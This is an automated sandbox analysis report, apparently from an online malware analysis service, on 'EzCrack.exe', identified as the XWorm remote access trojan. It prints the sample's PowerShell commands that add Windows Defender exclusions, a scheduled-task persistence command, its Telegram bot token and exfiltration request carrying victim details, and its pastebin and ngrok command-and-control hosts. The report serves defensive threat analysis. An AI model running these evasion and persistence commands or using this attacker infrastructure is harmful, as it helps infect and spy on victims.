Overview

overview

10

Static

static

10

EzCrack.exe

windows7-x64

10

EzCrack.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    132s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/06/2024, 16:13 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EzCrack.exe

  • Size

    78KB

  • MD5

    9efc872f4f99869fd6befd84076b1f02

  • SHA1

    6bb6931b260936082028812f079f5b4543e599e0

  • SHA256

    4e8aad0b31678291ca4b4dae74385c6a0d424b7c49a439f045573f93908a764c

  • SHA512

    cfc949b9db32db43a9f0ab9dd5c59624999c8df84aaeb953251198958a10dd744e273f560f4b16cd150c5bff1d66e6014f198ca0ea3f85e5afe189fe78e8c381

  • SSDEEP

    1536:dRNd9tEnU5G+eiIhLK7AiVqbDoxTBH/d1Pq63FBN77OCXnG73E:drdARhLIVqbDSH/dVPN3OCXGDE

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %Temp%

  • install_file

    ApplicationFrameHost.exe

  • pastebin_url

    https://pastebin.com/raw/gf3CpGLZ

  • telegram

    https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\EzCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\EzCrack.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EzCrack.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'EzCrack.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3236
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2496
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe"
      2⤵
      • Creates scheduled task(s)
      PID:4616
  • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:908
  • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2300

Network

  • flag-us
    DNS
    183.142.211.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.142.211.20.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.160:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Mon, 03 Jun 2024 16:13:31 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.443d3e17.1717431211.274c979c
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    23.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    160.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    160.61.62.23.in-addr.arpa
    IN PTR
    Response
    160.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-160deploystaticakamaitechnologiescom
  • flag-us
    DNS
    ip-api.com
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    EzCrack.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 03 Jun 2024 16:13:32 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    pastebin.com
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.4.235
    pastebin.com
    IN A
    172.67.19.24
    pastebin.com
    IN A
    104.20.3.235
  • flag-us
    GET
    https://pastebin.com/raw/gf3CpGLZ
    EzCrack.exe
    Remote address:
    104.20.4.235:443
    Request
    GET /raw/gf3CpGLZ HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 03 Jun 2024 16:13:38 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: max-age=1800, must-revalidate
    pragma: no-cache
    expires: Sat, 26 Jul 1997 05:00:00 GMT
    CF-Cache-Status: EXPIRED
    Last-Modified: Mon, 03 Jun 2024 16:13:37 GMT
    Server: cloudflare
    CF-RAY: 88e0f8b90b887689-LHR
  • flag-us
    DNS
    api.telegram.org
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9
    EzCrack.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 03 Jun 2024 16:13:39 GMT
    Content-Type: application/json
    Content-Length: 498
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    235.4.20.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    235.4.20.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.tcp.eu.ngrok.io
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    5.tcp.eu.ngrok.io
    IN A
    Response
    5.tcp.eu.ngrok.io
    IN A
    3.67.112.102
  • flag-us
    DNS
    102.112.67.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    102.112.67.3.in-addr.arpa
    IN PTR
    Response
    102.112.67.3.in-addr.arpa
    IN PTR
    ec2-3-67-112-102 eu-central-1compute amazonawscom
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 23.62.61.160:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.5kB
     6.4kB
     17
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    EzCrack.exe
    310 B
     347 B
     5
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 104.20.4.235:443
    https://pastebin.com/raw/gf3CpGLZ
    tls, http
    EzCrack.exe
    910 B
     5.9kB
     12
    11

    HTTP Request

    GET https://pastebin.com/raw/gf3CpGLZ

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9
    tls, http
    EzCrack.exe
    1.4kB
     7.2kB
     13
    11

    HTTP Request

    GET https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9

    HTTP Response

    200
  • 3.67.112.102:11061
    5.tcp.eu.ngrok.io
    EzCrack.exe
    2.2kB
     1.8kB
     29
    37
  • 8.8.8.8:53
    183.142.211.20.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    183.142.211.20.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    23.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    23.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    160.61.62.23.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    160.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    EzCrack.exe
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
     95 B
     1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    pastebin.com
    dns
    EzCrack.exe
    58 B
     106 B
     1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.4.235
    172.67.19.24
    104.20.3.235

  • 8.8.8.8:53
    api.telegram.org
    dns
    EzCrack.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    235.4.20.104.in-addr.arpa
    dns
    71 B
     133 B
     1
    1

    DNS Request

    235.4.20.104.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
     167 B
     1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    5.tcp.eu.ngrok.io
    dns
    EzCrack.exe
    63 B
     79 B
     1
    1

    DNS Request

    5.tcp.eu.ngrok.io

    DNS Response

    3.67.112.102

  • 8.8.8.8:53
    102.112.67.3.in-addr.arpa
    dns
    71 B
     136 B
     1
    1

    DNS Request

    102.112.67.3.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log
    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    35967cf5ed9a95ec4fe527dd96567a02

    SHA1

    6a7439c241a30ec540d5d204e02a4cbb2a464737

    SHA256

    4394552922777081d43fb523126cf176d5a676602a5435713320942034f6b3cf

    SHA512

    419b3c336a67ef964bc166d1267cea146ed5878f98304d6e39fb9a3c0394d75693810a9ddc101cdda5e3196ad7d603df01a3260705cf9ef7cf8d4b252df01f45

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    7a451cd1316d70a65910773fee8c3a43

    SHA1

    d2db32d5037153dd1d94565b51b5b385817a3c3d

    SHA256

    862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

    SHA512

    60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    3e242d3c4b39d344f66c494424020c61

    SHA1

    194e596f33d54482e7880e91dc05e0d247a46399

    SHA256

    f688037cb0c9f9c97b3b906a6c0636c91ad1864564feb17bba4973cde361172e

    SHA512

    27c1cd6d72554fdce3b960458a1a6bd3f740aa7c22a313a80b043db283a224bf390648b9e59e6bdbf48020d082d728fbde569bee4ee2a610f21d659a7b3dfa02

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    Filesize

    78KB

    MD5

    9efc872f4f99869fd6befd84076b1f02

    SHA1

    6bb6931b260936082028812f079f5b4543e599e0

    SHA256

    4e8aad0b31678291ca4b4dae74385c6a0d424b7c49a439f045573f93908a764c

    SHA512

    cfc949b9db32db43a9f0ab9dd5c59624999c8df84aaeb953251198958a10dd744e273f560f4b16cd150c5bff1d66e6014f198ca0ea3f85e5afe189fe78e8c381

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5u10viu.5dw.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3428-9-0x000001F3554F0000-0x000001F355512000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3428-18-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3428-15-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3428-14-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3428-3-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4724-0-0x00007FFFF3A33000-0x00007FFFF3A35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4724-57-0x00007FFFF3A33000-0x00007FFFF3A35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4724-58-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4724-2-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4724-1-0x00000000006F0000-0x000000000070A000-memory.dmp

    Filesize

    104KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.